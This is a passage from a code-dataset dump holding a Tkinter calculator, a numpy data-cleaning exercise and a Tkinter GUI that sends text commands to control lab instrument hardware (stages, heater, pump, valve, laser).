math\r\n\tmath = \"percent\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\t#e.insert(0, f_num / 100)\r\n\r\ndef button_sqrt():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"sqrt\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_plusminus():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"plusminus\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\n\r\n\r\n# Define buttons\r\n\r\nbutton_1 = Button(root, text=\"1\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(1))\r\nbutton_2 = Button(root, text=\"2\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(2))\r\nbutton_3 = Button(root, text=\"3\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(3))\r\nbutton_4 = Button(root, text=\"4\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(4))\r\nbutton_5 = Button(root, text=\"5\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(5))\r\nbutton_6 = Button(root, text=\"6\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(6))\r\nbutton_7 = Button(root, text=\"7\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(7))\r\nbutton_8 = Button(root, text=\"8\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(8))\r\nbutton_9 = Button(root, text=\"9\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(9))\r\nbutton_0 = Button(root, text=\"0\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(0))\r\nbutton_percent = Button(root, text=\"%\", padx=38, pady=20, bg=\"red\", command=button_percent)\r\nbutton_clear = Button(root, text=\"Clear\", padx=29, pady=20, bg=\"red\", command=button_clear)\r\nbutton_add = Button(root, text=\"+\", padx=40, pady=20, bg=\"sky blue\", command=button_add)\r\nbutton_divide = Button(root, text=\"/\", padx=40, pady=20, bg= \"sky blue\", command=button_divide)\r\nbutton_square = Button(root, text=\"x^2 \", padx=31, pady=20, bg=\"red\", command=button_square)\r\nbutton_subtract = Button(root, text=\"-\", padx=41, pady=20, bg=\"sky blue\", command=button_subtract)\r\nbutton_multiply = Button(root, text=\"*\", padx=40.5, pady=20, bg=\"sky blue\", command=button_multiply)\r\nbutton_plusminus = Button(root, text=\"+/-\", padx=33, pady=20, bg=\"red\", command=button_plusminus)\r\nbutton_sqrt = Button(root, text=\"sqrt \", padx=32, pady=20, bg=\"red\", command=button_sqrt)\r\nbutton_equal = Button(root, text=\"=\", padx=86, pady=20, bg=\"yellow\", command=button_equal)\r\n\r\n# Put buttons on screen\r\n\r\nbutton_1.grid(row=3, column=0)\r\nbutton_2.grid(row=3, column=1)\r\nbutton_3.grid(row=3, column=2)\r\n\r\nbutton_4.grid(row=2, column=0)\r\nbutton_5.grid(row=2, column=1)\r\nbutton_6.grid(row=2, column=2)\r\n\r\nbutton_7.grid(row=1, column=0)\r\nbutton_8.grid(row=1, column=1)\r\nbutton_9.grid(row=1, column=2)\r\n\r\nbutton_0.grid(row=4, column=0)\r\nbutton_percent.grid(row=4,column=1)\r\nbutton_clear.grid(row=4, column=2)\r\n\r\n\r\nbutton_add.grid(row=5, column=0)\r\nbutton_square.grid(row=5, column=2)\r\nbutton_divide.grid(row=5, column=1)\r\n\r\n\r\n\r\nbutton_subtract.grid(row=6, column=0)\r\nbutton_multiply.grid(row=6, column=1)\r\nbutton_plusminus.grid(row=6, column=2)\r\n\r\nbutton_sqrt.grid(row=7, column=0)\r\nbutton_equal.grid(row=7, columnspan = 2, column=1) #columnspan() to make wider\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"525828243","text":"import numpy as np # Import numpy.\n\n# Create a psudo dataset using a numpy array.\nx = np.array([100, 94,88,120, 130,80, 'fakevalue', '', 65, 150, 200, 'blah', 65,999])\n\n# Show raw dataset.\nprint('RAW DATASET:')\nprint(x)\n\n# Flag all values in the array that are not strings.\nis_number = [element.isdigit() for element in x]\n\n# Copy into new array that doesn't have the pesky strings.\nx_nums = x[is_number]\n\n# Convert the number 'strings' array into an array of actual numbers.\nx_nums = x_nums.astype(np.int)\n\n# Show numbers only.\nprint(' -> Numbers only: {0}'.format(x_nums))\n\n# Get upper limit by adding the mean + 2 standard deviations.\nupperlimit = np.mean(x_nums) + 2*np.std(x_nums)\n\n# Get the lower limit by subtracting two standard deviations from the mean.\nlowerlimit = np.mean(x_nums) - 2*np.std(x_nums)\n\n# Flag numbers that are non-outliers as valid.\nvalid = (x_nums < upperlimit) & (x_nums > lowerlimit)\n\n# Flag outliers as invalid.\ninvalid = (x_nums < lowerlimit) | (x_nums > upperlimit)\n\n# Make a copy of the dataset with only the numeric, valid (not outiers) results.\nclipped_dataset = x_nums[valid]\n\n# Show dataset with values removed.\nprint(' -> Outliers Removed: {0}'.format(clipped_dataset))\n\n# Valid is the complement of invalid.\ninvalid = ~valid\n\n# Calculate adjusted mean, with outliers removed.\nmean = np.mean(clipped_dataset)\nprint(' -> The adj. mean is {0}.'.format(mean))\n\n# Calculate the number of dummy values to insert to compensate for the invalid values.\ndummyct = len(x) - len(clipped_dataset) \n\nprint(' -> Replacing {0} invalid entries with {1}.'.format(dummyct,mean))\n\n# Create a numpy array with a dummy value for each string that was removed at the beginning.\ndummies = np.repeat(mean, dummyct)\n\n# Combine the clipped dataset with the numpy array of dummies. \ncleaned_dataset = np.concatenate((clipped_dataset, dummies), axis=0)\n\nprint('')\n\nprint('CLEANED DATASET:')\n\nprint(cleaned_dataset)\n\n# SUMMARY: The dataset has been cleaned by removing the non-numeric strings, converting the array to integers,\n# and then identifying the Gaussian outliers and removing them too. The script then compares the length of the 'clipped'\n# array and the lengh of the original array to calculate the number of dummy values to insert. The script then inserts\n# the mean as the dummy value until all of the missing values in the array have been replaced.","sub_path":"class1/Berkowitz-L04-DataCleaning.py","file_name":"Berkowitz-L04-DataCleaning.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"156962360","text":"from __future__ import print_function\nimport logging\nimport subprocess\nimport time\nfrom Tkinter import *\nfrom serial import *\nfrom threading import Thread, RLock\n\nfrom tendo import singleton\n\nFORMAT = '%(levelname)s:%(funcName)s:%(message)s'\nformat1 = '(%(threadName)-10s) %(message)s'\nlogging.basicConfig(format=format1, level=logging.DEBUG)\n\n# This line of code will only make it so that only one instance of the gui is running.\n# from tendo import singleton\nme = singleton.SingleInstance()\n\n\nclass KevinsThreadWithArgs(Thread):\n def __init__(self, group=None, target=None, name=None,\n args=(), kwargs=None, verbose=None):\n Thread.__init__(self, group=group, target=target, name=name,\n verbose=verbose)\n self.args = args\n self.kwargs = kwargs\n return\n\n def run(self):\n logging.debug('running with %s and %s', self.args, self.kwargs)\n return\n\n\n\ndef on_send_button_click():\n \"\"\"\n INVTHW\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = ''\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"INVTHW\", \"args\": args}\n proc.stdin.write(cmd)\n cnum += 1\n\n\ndef shutdown_button_click():\n \"\"\"\n Button click to stop/abort the thermo cycler's currently running sequence\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = ''\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SHUTDOWN\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n luna.quit()\n cnum += 1\n\ndef the_reader_thread():\n \"\"\"\n\n Need this reader thread to flush out proc.stdout\n :return:\n \"\"\"\n while (True):\n out = proc.stdout.readline()\n id = out[:10].strip()\n length = out[10:20].strip()\n device_name = out[20:84].strip()\n cmd = out[84:94].strip()\n args = out[94:]\n if cmd == \"INVTHW\":\n logging.info(\"Inside back_and_forth: %s\", out)\n if device_name == \"FluidValve\":\n return\n\ndef cont_run_Thread(min):\n \"\"\"\n\n :return:\n \"\"\"\n t_end = time.time() + (60 * min)\n while time.time() < t_end:\n time.sleep(1)\n getvi_THREAD1 = Thread(target=GETVI_Thread)\n getvi_THREAD1.start()\n time.sleep(1)\n capgett_thread1 = Thread(target=CAPGETT_Thread)\n capgett_thread1.start()\n capgett_thread1.join()\n\n\n\n\n##### SEQUENCSE OF AUTOMATION #######\ndef pt1_run_state_sequence():\n \"\"\"\n Have the heater on...\n\n automation function\n for LUNA prototype 1\n :return:\n \"\"\"\n \"\"\"\n Initilaize Gel\n \"\"\"\n # Start at buffer to initialize gel\n # down_thread1 = Thread(target=STAGEZDN_Thread)\n # down_thread1.start() # Probably dont need this thread since the buffer thread will check to see if it's at the buffer or not\n # buffer_thread1 = Thread(target=SXBUFFER_Thread)\n # buffer_thread1.start()\n # up_thread1 = Thread(target=STAGEZUP_Thread)\n # up_thread1.start()\n\n # Turn on the High Voltage 10kV\n # setv_thread1 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"10\"})\n # setv_thread1.start()\n # # Loops for 3 minutes\n # min = 3\n # t_end = time.time() + (60 * min)\n # while time.time() < t_end:\n # time.sleep(1)\n # getvi_THREAD1 = Thread(target=GETVI_Thread)\n # getvi_THREAD1.start()\n # # Turn off HV\n # setv_thread_off = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"0\"})\n # setv_thread_off.start()\n # getvi_thread_off = Thread(target=GETVI_Thread)\n # getvi_thread_off.start()\n\n # Transition to water\n # transition_down_thread1 = Thread(target=STAGEZDN_Thread)\n # transition_down_thread1.start()\n # transition_water_thread1 = Thread(target=SXWATER_Thread)\n # transition_water_thread1.start()\n # transition_up_thread1 = Thread(target=STAGEZUP_Thread)\n # transition_up_thread1.start()\n\n \"\"\"\n Injection\n \"\"\"\n # down_thread1 = Thread(target=STAGEZDN_Thread)\n # down_thread1.start()\n # sample_thread = Thread(target=SXSAMPLE_Thread)\n # sample_thread.start()\n # up_thread1 = Thread(target=STAGEZUP_Thread)\n # up_thread1.start()\n #\n # # Turn on the High Voltage 5kV\n # setv_thread2 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"5\"})\n # setv_thread2.start()\n # # Loops for 10 seconds\n # sec = 10\n # t_end = time.time() + sec\n # while time.time() < t_end:\n # time.sleep(1)\n # getvi_THREAD1 = Thread(target=GETVI_Thread)\n # getvi_THREAD1.start()\n # # Turn off HV\n # setv_thread_off = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"0\"})\n # setv_thread_off.start()\n # getvi_thread_off = Thread(target=GETVI_Thread)\n # getvi_thread_off.start()\n #\n # # Transition to water\n # transition_down_thread2 = Thread(target=STAGEZDN_Thread)\n # transition_down_thread2.start()\n # transition_water_thread2 = Thread(target=SXWATER_Thread)\n # transition_water_thread2.start()\n # transition_up_thread2 = Thread(target=STAGEZUP_Thread)\n # transition_up_thread2.start()\n #\n #\n # \"\"\"\n # Run\n # \"\"\"\n # down_thread4 = Thread(target=STAGEZDN_Thread)\n # down_thread4.start() # Probably dont need this thread since the buffer thread will check to see if it's at the buffer or not\n # buffer_thread4 = Thread(target=SXBUFFER_Thread)\n # buffer_thread4.start()\n # up_thread4 = Thread(target=STAGEZUP_Thread)\n # up_thread4.start()\n #\n # # Turn on HV\n # setv_thread_on = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"10\"})\n # setv_thread_on.start()\n # getvi_thread_on = Thread(target=GETVI_Thread)\n # getvi_thread_on.start()\n #\n # # Set and turn on Laser\n setlstate_thread_on = Thread(target=SETLSTATE_Thread, kwargs={\"state\": \"ON\"})\n setlstate_thread_on.start()\n time.sleep(3)\n getlspower_thread1 = Thread(target=GETLPWR_Thread)\n getlspower_thread1.start()\n time.sleep(3)\n setlpower_thread = Thread(target=SETLPOWER_Thread, kwargs={\"watts\": 10})\n setlpower_thread.start()\n time.sleep(3)\n getlspower_thread2 = Thread(target=GETLPWR_Thread)\n getlspower_thread2.start()\n time.sleep(3)\n setlstate_thread_off = Thread(target=SETLSTATE_Thread, kwargs={\"state\": \"OFF\"})\n setlstate_thread_off.start()\n #\n # # Turn on spectrometer, do this after I test out all the rest.\n #\n # # Start a reader thread\n # running_for_however_long_thread = Thread(target=cont_run_Thread, kwargs={\"min\": 45})\n # running_for_however_long_thread.start()\n\ndef back_and_forth():\n\n # global automation_lock\n\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n right_thread1 = Thread(target=SXRGHTBIG_Thread)\n right_thread1.start()\n\n left_thread1 = Thread(target=SXLFTBIG_Thread)\n left_thread1.start()\n\n right_thread2 = Thread(target=SXRGHTBIG_Thread)\n right_thread2.start()\n\n left_thread2 = Thread(target=SXLFTBIG_Thread)\n left_thread2.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n right_thread1.join()\n left_thread1.join()\n right_thread2.join()\n left_thread2.join()\n up_thread1.join()\n logging.info(\"Finished start_thread_button_click\")\n\ndef go_to_sample():\n \"\"\"\n\n :return:\n \"\"\"\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXSAMPLE_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to sample\")\n\ndef go_to_buffer():\n \"\"\"\n 1) STAGEZDN\n 2) SXBUFFER\n 3) STAGEZUP\n :return:\n \"\"\"\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXBUFFER_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to buffer\")\n\ndef go_to_water():\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXWATER_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to water\")\n\ndef go_to_waste():\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXWASTE_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to waste\")\n\ndef up_and_down():\n\n\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n up_thread2 = Thread(target=STAGEZUP_Thread)\n up_thread2.start()\n\n down_thread2 = Thread(target=STAGEZDN_Thread)\n down_thread2.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n up_thread2.join()\n up_thread1.join()\n down_thread2.join()\n logging.info(\"Up and down function\")\n\n################################ Dave's Machines ########################\n\"\"\"\nCapillary Heater\n\"\"\"\ndef CAPHEATON_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPHEATON\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n # TODO Need a feedback from the pi\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef CAPHEATOFF_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPHEATOFF\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n # TODO Need a feedback from the pi\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef gett_cap_heater_button_click():\n #TODO To make this into a thread and have it in pimain.py\n \"\"\"\n\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPGETT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\ndef CAPGETT_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPGETT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef sett_cap_heater_button_click(entry):\n \"\"\"\n Button click to set the capillary heater temperature [degrees C]\n :param entry: Tkinter entry\n :return:\n \"\"\"\n input = entry.get()\n global proc\n global cnum\n size = 94 + len(input)\n name = 'Pi'\n args = input\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPSETT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\n\n\"\"\"\nLaser Motor\n\"\"\"\ndef LASLEFT_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"LASLEFT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef LASRIGHT_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"LASRIGHT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef LMHOME_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"LMHOME\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef CAPREADY_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPREADY\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\n\"\"\" Fluidic Valve Commands \"\"\"\ndef FVALVEPOS_Thread(valve_pos = \"CLOSED\"):\n \"\"\"\n Thread function that set's the Fluidic Valve to whatever position is passed as the\n parameter\n :param valve_pos: string \"A\"|\"B\"|\"CLOSED\"\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n name = 'FluidValve'\n size = 94 + len(valve_pos)\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"FVALVEPOS\", \"args\": valve_pos}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n finally:\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n automation_lock.release()\n\ndef set_fluidic_valve_clicked():\n input = valve_set.get()\n global proc\n global cnum\n name = 'FluidValve'\n if input==1:\n args = 'A'\n elif input==2:\n args = 'B'\n elif input==3:\n args = 'CLOSED'\n size = 94 + len(args)\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"FVALVEPOS\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n\n\"\"\"\nGel Pump\n\"\"\"\ndef GPHOME_Thread():\n \"\"\"\n GPHOME\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPHOME\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef GPSTART_Thread():\n \"\"\"\n GPSTART\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPSTART\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n finally:\n # logging.info(\"releasing lock from\")\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n automation_lock.release()\n\ndef gp_up_button_click():\n \"\"\"\n GPUP\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPUP\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\ndef gp_down_button_click():\n \"\"\"\n GPDOWN\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPDOWN\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\n# def gp_rate_button_click(entry):\n# \"\"\"\n# GPRATE_10 [microL/sec]\n# :return:\n# \"\"\"\n# #TODO still need to fix this\n# input = entry.get()\n# global proc\n# global cnum\n# size = 94 + len(input)\n# name = 'Pi'\n# args = input\n# cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n# {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPRATE\", \"args\": args}\n# proc.stdin.write(cmd)\n# cnum += 1\n\n################################ Dave's Machines ########################\ndef kill_pi_clicked():\n \"\"\"\n\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"KILL\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum+=1\n\n\"\"\"\nOBIS Laser\n\"\"\"\n\ndef GETLPWR_Thread():\n \"\"\"\n Get Laser Power\n CMD: \t\t\tGETLPWR\n Device Name: \tOBISLaser\n Response: \t\tOK________[power in watts]\\n\n Example: \t\tGETLPWR___\\n\n Description: \t\tWill return the current output power (in watts).\n\n Still need to test\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'OBISLaser'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GETLPWR\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SETLPOWER_Thread(watts=1):\n \"\"\"\n Set Laser Power\n CMD: \t\t\tSETLPWR [watts]\n Device Name: \tOBISLaser\n Response: \t\tOK________\\n\n Example: \t\tSETLPWR___0.01600\\n\n Description: \t\tWill set the current output power (in watts).\n\n Still need to test\n :param watts:\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n watts = str(watts)\n size = 94 + len(watts)\n name = 'OBISLaser'\n args = watts\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETLPWR\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \"+out)\n finally:\n automation_lock.release()\n\ndef SETLSTATE_Thread(state=\"OFF\"):\n \"\"\"\n Turn Laser ON or OFF\n CMD: \t\t\tSETLSTATE [ON|OFF]\n Device Name: \tOBISLaser\n Response: \t\tOK________\\n\n Example:\t\tSETLSTATE_OFF\\n\n Description:\t\tWill turn on or off the laser.\n\n Still need to test\n Command to turn on the OBIS Laser on/off\n :param state: \"ON\" or \"OFF\" (default)\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94 + len(state)\n name = 'OBISLaser'\n args = state\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETLSTATE\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \"+out)\n finally:\n automation_lock.release()\n\n\n\n\"\"\"\nSolution Stage X and Z\n\"\"\"\ndef SXLFTBIG_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXLFTBIG\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef SXRGHTBIG_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXRGHTBIG\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n # logging.info(\"releasing lock from\")\n automation_lock.release()\n\n\ndef SXLFTSM_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXLFTSM\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SXRGHTSM_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXRGHTSM\", \"args\": 